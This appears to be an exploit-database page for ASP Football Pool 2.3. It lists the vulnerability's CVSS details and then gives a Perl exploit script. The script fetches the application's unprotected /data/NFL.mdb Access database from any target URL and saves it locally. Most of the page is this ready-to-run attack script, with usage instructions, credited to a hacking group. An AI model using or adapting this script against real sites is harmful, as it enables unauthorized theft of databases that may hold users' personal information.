ASP Football Pool 2.3 Remote Database Disclosure Vulnerability

2009.07.28
Credit: ByALBAYX
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-264


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

#!/usr/bin/perl # # #ASP Football Pool v2.3 # #Script : ASP Football Pool v2.3 # #Demo : http://brainjar.com/AspFootballPool/demo1 # #Download : http://www.brainjar.com/AspFootballPool/download/AspFootballPool_2.3.zip # # _.--"""""--._ # .' '. # / \ # ; C4TEAM ; # | | # | | # ; ; ByALBAYX # \ (`'--, ,--'`) / # \ \ _ ) ( _ / / WWW.C4TEAM.ORG # ) )(')/ \(')( ( # (_ `""` /\ `""` _) # \`"-, / \ ,-"`/ # `\ / `""` \ /` # |/\/\/\/\/\| # |\ /| # ; |/\/\/\| ; # \`-`--`-`/ # \ / # ',__,' # # #ASP Football Pool v2.3 Remote Database Disclosure Exploit # #Exploited ByALBAYX ########## # use lwp::UserAgent; system('cls'); system('title ASP Football Pool v2.3 Database Disclosure Exploit'); system('color 2'); if (!defined($ARGV[0])) {print "[!] Usage : \n exploit.pl http://site.com\n";exit();} if ($ARGV[0] =~ /http:\/\// ) { $site = $ARGV[0]."/"; } else { $site = "http://".$ARGV[0]."/"; } print "\n\n[-] ASP Football Pool v2.3 Database Disclosure Exploit\n"; print "[-]Exploited ByALBAYX \n\n\n"; print "[!] Exploiting $site ....\n"; my $site = $ARGV[0] ; my $target = $site."/data/NFL.mdb" ; my $useragent = LWP::UserAgent->new(); my $request = $useragent->get($target,":content_file" => "c:/db.mdb"); if ($request->is_success) {print "[+] $site Kaydedildi! Git= c:/db.mdb";exit();} else {print "[!] Exploit $site Failed !\n[!] ".$request->status_line."\n";exit();}

References:

http://www.milw0rm.com/exploits/8852
http://secunia.com/advisories/35317


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top